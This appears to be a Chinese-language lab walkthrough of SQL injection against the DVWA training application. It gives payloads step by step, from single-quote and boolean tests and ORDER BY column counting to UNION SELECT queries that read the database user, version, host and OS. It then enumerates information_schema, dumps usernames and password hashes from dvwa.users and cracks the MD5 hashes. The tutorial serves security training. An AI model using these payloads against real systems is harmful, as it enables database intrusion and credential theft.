终于到了SQL注入
最大的、最经典的、最常见的Web漏洞就是SQL注入漏洞
SQL注入的原理这里就不说了,百度
打开DVWA,SQL注入测试模块
测试单引号,发现出错,于是想到测试语句:
1' or '1'='1
成功:
测试是否存在漏洞:
1' and '1'='1 如果返回数据,但是1' and '1'='0 不返回数据,代表存在sql注入
或者简易一些:1' and '1 返回但是1' and '0不返回数据
进一步:
猜测当前SQL语句总共查询了多少字段:
' order by 50 --
注意--后边必须跟一个空格,--作用是注释最后一个单引号,必须跟空格
首先猜测50过大会报错:
Unknown column '50' in 'order clause'
然后继续猜测小于五十的数:
直到我猜测到2
当我把这里修改成2后,提交没有任何反应
于是得出结论:查询了两个字段,源码验证sql语句为:
SELECT first_name, last_name FROM users WHERE user_id = '$id'
猜测成功,查询了两个字段
接下来我想在后边加入select语句来执行查询命令:
不过两个select语句连在一起是不允许的
于是想到使用联合查询(union)
注意:--跟上空格
这时候可以进一步确定:firstname为第一个字段,surname是第二个字段
既然知道了1,2对应的位置,那么就可以使用SQL函数来查询其他信息:
比如这里我查询到了数据库当前的用户
再使用:' union select user(),version() --
可以查到数据库版本:
联系日常经验:5版本的数据库不会是MSSQL或者Oracle
最流行的5版本数据库就是MySQL
查询当前数据库:database函数
' union select user(),database() --
使用全局函数:
' union select user(),@@datadir --
类似地:
' union select user(),@@hostname --
查询操作系统:
' union select user(),@@version_compile_os --
切分字符串的功能:
' union select null,substring_index(USER(),"@",1) --
这句话的意思是查出来user信息,然后以@分隔开,取前一部分
有时候我们提交的字符会被服务器过滤,于是可以使用SQL的CHAR函数进行ASCII码转换
如果我们需要查很多的函数,而显示的位置很好,可以联合函数CONCAT_WS
使用一个稍复杂的SQL语句:
' union select CONCAT_WS(CHAR(32,58,32),user(),database(),version()),null --
这里的CHAR(32,58,32)是空格冒号空格,方便显示
MySQL的数据存储相对简单,有一个元数据表infotmation_schema表
于是可以利用这张表查询数据库的很多信息:
查询所有库里面的所有表:
' union select table_name,table_schema from information_schema.tables --
找到了dvwa库里面的很多表:
查询每一个库有多少表:
' union select table_schema,count(*) from information_schema.tables group by table_schema --
只针对dvwa库进行查询:
' union select table_name,table_schema from information_schema.tables where table_schema='dvwa' --
查询dvwa库中users表都有哪些字段:
' union select table_name,column_name from information_schema.columns where table_schema='dvwa' and table_name='users' --
知道了有user和password两列,我们就可以直接进行查询了:
' union select user,password from dvwa.users --
查到了所有的用户名和加密的密码
使用concat来改一下显示格式也行:
' union select null,concat(user,0x3a,password) from dvwa.users --
加密的密码根据长度猜测为MD5加密
也可以使用Kali的hash-identifier来验证:
于是考虑如何解密:把这些指定格式的用户名密码复制出来,弄到一个文本中
破解成功:
